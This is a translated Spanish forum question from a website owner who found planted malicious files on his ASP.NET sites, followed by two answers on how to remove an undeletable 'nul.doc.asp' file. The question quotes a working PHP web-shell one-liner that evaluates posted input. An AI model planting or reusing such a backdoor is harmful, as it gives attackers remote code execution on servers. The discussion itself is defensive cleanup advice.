archivo malicioso en mis sitios web, no puedo eliminarlo [duplicar]

Navega tus respuestas
0

Hace aproximadamente 10 días vi 2 archivos desconocidos en mis sitios web (sitios web ASP.NET).

se diseminaron en los 3 sitios web de mi, y se colocaron en la carpeta CSS.

El primero fue con el nombre de 'Paths.php' con este código en él. 

500 <?php @eval($_POST['360']);?>

Cuando busqué en Google el código, descubrí que es una especie de puerta trasera que puede enviar lo que quiera a través de una URL que apunta al archivo malicioso. Así que lo borré de inmediato.

Pero el segundo archivo que tiene el nombre de 'nul.doc.asp', que no pude ver su código ni siquiera borrarlo, tiene un nombre que no puedo cambiar de nombre, editar, mover , eliminar, el servidor dice que no puede alcanzarlo.

Estoy realmente desesperado por deshacerme de él sin suerte, incluso contacté con el Servicio de atención al cliente y no hicieron nada en 10 días.

Entonces, ¿pueden ayudarme, muchachos deshaciéndose de él?

P.S Incluso intenté eliminar un sitio web completo, todo se eliminó excepto el archivo.

    
pregunta Remy Jouni 20.10.2016 - 02:52
fuente

2 respuestas

0

¿Qué hay de subirte un código de shell que eliminaría el archivo?

Algo como deleteThaFile.asp: 

<%
     Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
     Call oFileSys.DeleteFile("nul.doc.asp", True)
%>

¿Eso ayudaría?

También puede usar FileSystemObject para obtener más información sobre el archivo (y otros archivos) para comprender mejor por qué no se puede eliminar.

Es posible que también puedas implementar allí un shell ASP más genérico como el administrador de archivos, para ver más qué se puede hacer con respecto al archivo.

    
respondido por el Michal Ambroz 20.10.2016 - 03:05
fuente
0

Voy a asumir que estás en un servidor Windows 2008/2012 con una UI completa.

Debería poder hacer clic derecho - > Propiedades - > Pestaña de seguridad - > Botón Avanzado - > Tabulación del propietario.

Desde esta pestaña, deberías poder asignar la propiedad a tu usuario. A partir de ahí, deberías poder eliminarlo.

Si no tiene una IU y está ejecutando el núcleo del servidor, etc., puede ejecutar: TAKEOWN / F nul.doc.asp

Antes de que lo elimines, una vez que tengas la propiedad, probablemente querría echarle un vistazo, solo para ver qué está pasando. Luego, elimínelo o, por lo menos, cámbiele el nombre.

Espero que ayude.

    
respondido por el mumbles 20.10.2016 - 03:16
fuente

Lea otras preguntas en las etiquetas

¿Puede el contenido de un texto sin formato ayudar a romper la clave de la codificación utilizada? [duplicar] Un programa de terceros está almacenando una contraseña en un DSN. ¿Es una amenaza de seguridad?